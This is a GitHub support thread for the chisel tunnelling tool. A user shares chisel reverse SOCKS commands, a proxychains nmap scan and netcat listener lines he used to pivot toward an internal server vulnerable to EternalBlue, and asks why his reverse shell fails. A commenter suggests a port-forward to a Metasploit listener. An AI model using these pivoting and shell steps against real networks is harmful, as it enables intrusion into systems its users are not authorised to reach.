### ISSUE TITLE
[Support] Getting a reverse shell with chisel

### ISSUE THREAD

**Issue by sinanozdemir** [jpillora/chisel#220]
Hi,

This may not be an issue on chisel's end, but on my end. I am hoping someone can lead me to the right direction.

**Here is my scenario:**

_Kali box IP address: 1.1.1.1_

_Win7 external IP address: 1.1.1.2
Win7 internal IP address: 1.1.2.1_

_Win-Server internal IP address: 1.1.2.2_

And let's say that Win-Server has Eternal Blue vuln. Here is my chisel set up to reach to Win-Server:

_On Kali box: ./chisel server -p 1111 --reverse --socks5_

_On Win7: chisel.exe 1.1.1.1:1111 R:socks_

With the above, I can use _proxychains nmap -sTV -n -Pn --top-ports 10 1.1.2.2_ to scan the ports.

So far so good. However, when I try to send an exploit to 1.1.2.2 with a reverse shell, it always fail. The reverse shell setting is _LHOST: 1.1.2.1 and LPORT: 3333_, I also tried with _LHOST: 1.1.1.1_. Unfortunately, the reverse shell doesn't work at all.

**I have tried the below listeneers so far:**

_nc -nlvp 3333 --> nothing happens, it just says "listening"
proxychains nc -nlvp 3333 --> nothing happens, it just says "listening"
proxychains nc 1.1.2.1 3333 --> it says "connection refused"_

Kindly, if someone suggests a work around for reverse shell. I would like to emphasize that the bind shell works perfectly.

Thank you.

**Comment by shantanu561993** [comment]
You need to set LHOST as 1.1.1.2 and portfoward LPORT on 1.1.1.2 to your Msf listener

**Comment by sinanozdemir** [comment]
Hey @shantanu561993,

That didn't work, plus why would you use the external IP (1.1.1.2) of the target machine for pivoting, you need the internal IP (1.1.2.1) address. Anyway, the bind shell works, but not the reverse shell. This could be by design. I am not sure.

Thanks for your feedback.

**Comment by jpillora** [comment]
This doesn't appear to be a chisel issue...

**Comment by sinanozdemir** [comment]
Thanks @jpillora. 

I agree with you and I also indicated in my first post that this might not be an issue on chisel's end, but on my end so I am not saying this is a chisel issue. However, I used ssf for the above setting and I was able to receive a reverse shell back. I love chisel and use it all the time. I simply asked for directions here. Anyways, thanks for everyone for feedback, I really appreciate it.
